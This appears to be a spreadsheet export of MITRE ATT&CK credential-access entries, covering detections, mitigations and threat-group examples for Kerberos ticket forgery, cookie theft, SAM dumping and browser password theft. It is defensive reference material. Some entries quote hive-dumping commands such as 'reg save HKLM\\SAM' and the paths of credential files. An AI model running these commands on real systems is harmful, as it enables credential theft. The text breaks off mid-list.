Ensure certificate authorities (CA) are properly secured, including treating CA servers (and other resources hosting CA certificates) as tier 0 assets. Harden abusable CA settings and attributes.
For example, consider disabling the usage of AD CS certificate SANs within relevant authentication protocol settings to enforce strict user mappings and prevent certificates from authenticating as other identifies.(Citation: SpecterOps Certified Pre Owned) Also consider enforcing CA Certificate Manager approval for the templates that include SAN as an issuance requirement.
Audit
Check and remediate unneeded existing authentication certificates as well as common abusable misconfigurations of CA settings and permissions, such as AD CS certificate enrollment permissions and published overly permissive certificate templates (which define available settings for created certificates). For example, available AD CS certificate templates can be checked via the Certificate Authority MMC snap-in (`certsrv.msc`). `certutil.exe` can also be used to examine various information within an AD CS CA database.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub PSPKIAudit)(Citation: GitHub Certify)
Disable or Remove Feature or Program
Consider disabling old/dangerous authentication protocols (e.g. NTLM), as well as unnecessary certificate features, such as potentially vulnerable AD CS web and other enrollment server roles.(Citation: SpecterOps Certified Pre Owned)
Encrypt Sensitive Information
Ensure certificates as well as associated private keys are appropriately secured. Consider utilizing additional hardware credential protections such as trusted platform modules (TPM) or hardware security modules (HSM). Enforce HTTPS and enable Extended Protection for
Authentication.(Citation: SpecterOps Certified Pre Owned)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.(Citation: Mandiant APT29 Trello)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.(Citation: AADInternals Documentation)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s `CRYPTO` module can create and export various types of authentication certificates.(Citation: Adsecurity Mimikatz Guide)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
Monitor for use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver.
OS API Execution
Monitor for API calls associated with polling to intercept keystrokes.
Windows Registry Key Modification
Monitor for changes to windows registry keys or values that may target multi-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources.
User Training
Remove smart cards when not in use.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom collection method to intercept two-factor authentication soft tokens.(Citation: FoxIT Wocao December 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.(Citation: NCC Group Chimera January 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a proprietary tool to intercept one time passwords required for two-factor authentication.(Citation: KISA Operation Muzabi)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.(Citation: Alienvault Sykipot DOD Smart Cards)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket) Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally.
Command Execution
Monitor executed commands and arguments that may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).
File Access
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as  [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored. Monitor for unusual processes accessing &lt;code&gt;secrets.ldb&lt;/code&gt; and &lt;code&gt;.secrets.mkey&lt;/code&gt; located in &lt;code&gt;/var/lib/sss/secrets/&lt;/code&gt;.
Logon Session Metadata
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)
Active Directory Configuration
For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. For each domain, change the KRBTGT account password once, force replication, and then change the password a second time. Consider rotating the KRBTGT account password every 180 days.(Citation: STIG krbtgt reset)
Encrypt Sensitive Information
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Password Policies
Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.(Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Privileged Account Management
Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Access
Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials to cloud service management consoles. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.
Process Access
Monitor for attempts by programs to inject into or dump browser process memory.
Multi-factor Authentication
A physical second factor key that uses the target login domain as part of the negotiation protocol will prevent session cookie theft through proxy methods.(Citation: Evilginx 2 July 2018)
Software Configuration
Configure browsers or tasks to regularly delete persistent cookies.
User Training
Train users to identify aspects of phishing attempts where they're asked to enter credentials into a site that has the incorrect domain for the application they are logging into.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) stole Chrome browser cookies by copying the Chrome profile directories of targeted users.(Citation: CrowdStrike StellarParticle January 2022)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) can steal cookies and session information from browsers.(Citation: ESET EvilNum July 2020)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used an unnamed post-exploitation tool to steal cookies from the Chrome browser.(Citation: Kaspersky LuminousMoth July 2021)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used a script that extracts the web session cookie and sends it to the C2 server.(Citation: Cybereason Chaes Nov 2020) 
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. (Citation: Unit42 CookieMiner Jan 2019)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can harvest cookies and upload them to the C2 server.(Citation: Prevailion EvilNum May 2020)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can steal the victim's cookies to use for duplicating the active session from another device.(Citation: IBM Grandoreiro April 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability to capture web session cookies.(Citation: Kroll Qakbot June 2020)(Citation: Kaspersky QakBot September 2021)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses &lt;code&gt;scp&lt;/code&gt; to access the &lt;code&gt;~/Library/Cookies/Cookies.binarycookies&lt;/code&gt; file.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4769, 4768), RC4 encryption within TGTs, and TGS requests without preceding TGT requests. Monitor the lifetime of TGT tickets for values that differ from the default domain duration. Monitor for indications of Pass the Ticket being used to move laterally.
Logon Session Metadata
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672). Correlate other security systems with login information (e.g., a user has the KRBTGT account password hash and forges Kerberos ticket-granting tickets). 
Active Directory Configuration
For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. For each domain, change the KRBTGT account password once, force replication, and then change the password a second time. Consider rotating the KRBTGT account password every 180 days.(Citation: STIG krbtgt reset)
Privileged Account Management
Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used [Mimikatz](https://attack.mitre.org/software/S0002) to generate Kerberos golden tickets.(Citation: NCC Group APT15 Alive and Strong)
Empire
[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use golden tickets.(Citation: Github PowerShell Empire)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create golden tickets.(Citation: GitHub Mimikatz kerberos Module)(Citation: Cobalt Strike Manual 4.3 November 2020)
Rubeus
[Rubeus](https://attack.mitre.org/software/S1071) can forge a ticket-granting ticket.(Citation: GitHub Rubeus March 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Metadata
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).
Encrypt Sensitive Information
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Password Policies
Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.(Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Privileged Account Management
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.(Citation: AADInternals Documentation)
Empire
[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use silver tickets.(Citation: Github PowerShell Empire)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create silver tickets.(Citation: GitHub Mimikatz kerberos Module)
Rubeus
[Rubeus](https://attack.mitre.org/software/S1071) can create silver tickets.(Citation: GitHub Rubeus March 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor for anomalous activity, such as enabling Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).
Audit
Kerberos preauthentication is enabled by default. Older protocols might not support preauthentication therefore it is possible to have this setting disabled. Make sure that all accounts have preauthentication whenever possible and audit changes to setting. Windows tools such as PowerShell may be used to easily find which accounts have preauthentication disabled.  (Citation: Microsoft Preauthentication Jul 2012)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
Encrypt Sensitive Information
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Password Policies
Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Rubeus
[Rubeus](https://attack.mitre.org/software/S1071) can reveal the credentials of accounts that have Kerberos pre-authentication disabled through AS-REP roasting.(Citation: GitHub Rubeus March 2023)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.
Process Creation
Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes.
User Account Authentication
Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.
Application Developer Guidance
Application developers should consider taking measures to validate authentication requests by enabling one-time passwords, providing timestamps or sequence numbers for messages sent, using digital signatures, and/or using random session keys.(Citation: Comparitech Replay Attack)(Citation: Bugcrowd Replay Attack)
Application Isolation and Sandboxing
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist.(Citation: Ars Technica Pwn2Own 2017 VM Escape)
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.(Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.(Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.
Threat Intelligence Program
Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.
Update Software
Update software regularly by employing patch management for internal enterprise endpoints and servers.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.
File Access
Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.
File Creation
Monitor newly constructed files being written with default names that have extracted credentials from the Security Account Manager.
Windows Registry Key Access
Monitor for the SAM registry key dump being created to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.
Operating System Configuration
Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.(Citation: Mandiant APT41)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors dumped account hashes using [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\SYSTEM system.hiv`, `reg save HKLM\\SAM sam.hiv`, and `reg save HKLM\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.(Citation: Cybereason OperationCuckooBees May 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used the `reg save` command to save registry hives.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has extracted the SAM and SYSTEM registry hives using the `reg.exe` binary for obtaining password hashes from a compromised machine.(Citation: Sygnia Elephant Beetle Jan 2022)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;reg&lt;/code&gt; commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.(Citation: Cybereason Soft Cell June 2019)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using gsecdump.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used [gsecdump](https://attack.mitre.org/software/S0008) to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has acquired credentials from the SAM/SECURITY registry hives.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can recover hashed passwords.(Citation: cobaltstrike manual)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) collects Windows account hashes.(Citation: F-Secure The Dukes)
CozyCar
Password stealer and NTLM stealer modules in [CozyCar](https://attack.mitre.org/software/S0046) harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.(Citation: F-Secure CozyDuke)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)
Fgdump
[Fgdump](https://attack.mitre.org/software/S0120) can dump Windows password hashes.(Citation: Mandiant APT1)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has the capability to harvest credentials and passwords from the SAM database.(Citation: US-CERT HOPLIGHT Apr 2019)	
IceApple
[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump encrypted password hashes from SAM registry keys, including `HKLM\SAM\SAM\Domains\Account\F` and `HKLM\SAM\SAM\Domains\Account\Users\*\V`.(Citation: CrowdStrike IceApple May 2022)
Impacket
SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)
Mivast
[Mivast](https://attack.mitre.org/software/S0080) has the capability to gather NTLM password information.(Citation: Symantec Backdoor.Mivast)
POWERTON
[POWERTON](https://attack.mitre.org/software/S0371) has the ability to dump password hashes.(Citation: FireEye APT33 Guardrail)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can dump the SAM database.(Citation: Kaspersky ProjectSauron Technical Analysis)
gsecdump
[gsecdump](https://attack.mitre.org/software/S0008) can dump Windows password hashes from the SAM.(Citation: TrueSec Gsecdump)
pwdump
[pwdump](https://attack.mitre.org/software/S0006) can be used to dump credentials from the SAM.(Citation: Wikipedia pwdump)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Enumeration
Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from cloud secrets managers, such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure. Alert on any suspicious usages of these commands, such as an account or service generating an unusually high number of secret requests.
Command Execution
Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials.
File Access
Monitor for files being accessed that may search for common password storage locations to obtain user credentials.
OS API Execution
Monitor for API calls that may search for common password storage locations to obtain user credentials.
Process Access
Monitor for processes being accessed that may search for common password storage locations to obtain user credentials.
Process Creation
Monitor newly executed processes that may search for common password storage locations to obtain user credentials.
Password Policies
The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.
Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations.
Privileged Account Management
Limit the number of accounts and services with permission to query information from password stores to only those required. Ensure that accounts and services with permissions to query password stores only have access to the secrets they require.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.(Citation: Microsoft Deep Dive Solorigate January 2021) 
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used the Smartftp Password Decryptor tool to decrypt FTP passwords.(Citation: BitDefender Chafer May 2020)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) can collect email credentials from victims.(Citation: ESET EvilNum July 2020)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.(Citation: Visa FIN6 Feb 2019)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has run `cmdkey` on victim machines to identify stored credentials.(Citation: Kaspersky Lyceum October 2021)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349) and other tools, including by dumping passwords saved in victim email.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.(Citation: Citizen Lab Stealth Falcon May 2016)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has attempted to obtain credentials from OpenSSH, realvnc, and PuTTY.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)
Carberp
[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.(Citation: F-Secure The Dukes)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from WINSCP.(Citation: Cybereason Kimsuky November 2020)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from databases, mail, and WiFi across multiple platforms.(Citation: GitHub LaZagne Dec 2018)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) is capable of stealing Outlook passwords.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)	
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can retrieve passwords from messaging and mail client applications.(Citation: Red Canary NETWIRE January 2020)
OLDBAIT
[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from several email clients.(Citation: FireEye APT28)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)
PinchDuke
[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.(Citation: F-Secure The Dukes)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can decrypt passwords stored in the RDCMan configuration file.(Citation: SecureWorks August 2019)
Prikormka
A module in [Prikormka](https://attack.mitre.org/software/S0113) collects passwords stored in applications installed on the victim.(Citation: ESET Operation Groundbait)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
File Access
Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser.
OS API Execution
Monitor for API calls that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
Process Access
Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).
Password Policies
Organizations may consider weighing the risk of storing credentials in web browsers. If web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in web browsers.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) stole users' saved passwords from Chrome.(Citation: CrowdStrike StellarParticle January 2022)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used tools to dump passwords from browsers.(Citation: Symantec Buckeye)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.(Citation: FireEye APT37 Feb 2018)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.(Citation: Check Point Rocket Kitten)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used a [Mimikatz](https://attack.mitre.org/software/S0002)-based tool and a PowerShell script to steal passwords from Google Chrome.(Citation: Kaspersky Lyceum October 2021)
Inception
[Inception](https://attack.mitre.org/groups/G0100) used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.(Citation: Symantec Inception Framework March 2018)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used browser extensions including Google Chrome to steal passwords and cookies from browsers. [Kimsuky](https://attack.mitre.org/groups/G0094) has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.(Citation: Zdnet Kimsuky Dec 2018)(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained passwords and session tokens with the use of the Redline password stealer.(Citation: MSTIC DEV-0537 Mar 2022)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)
Molerats
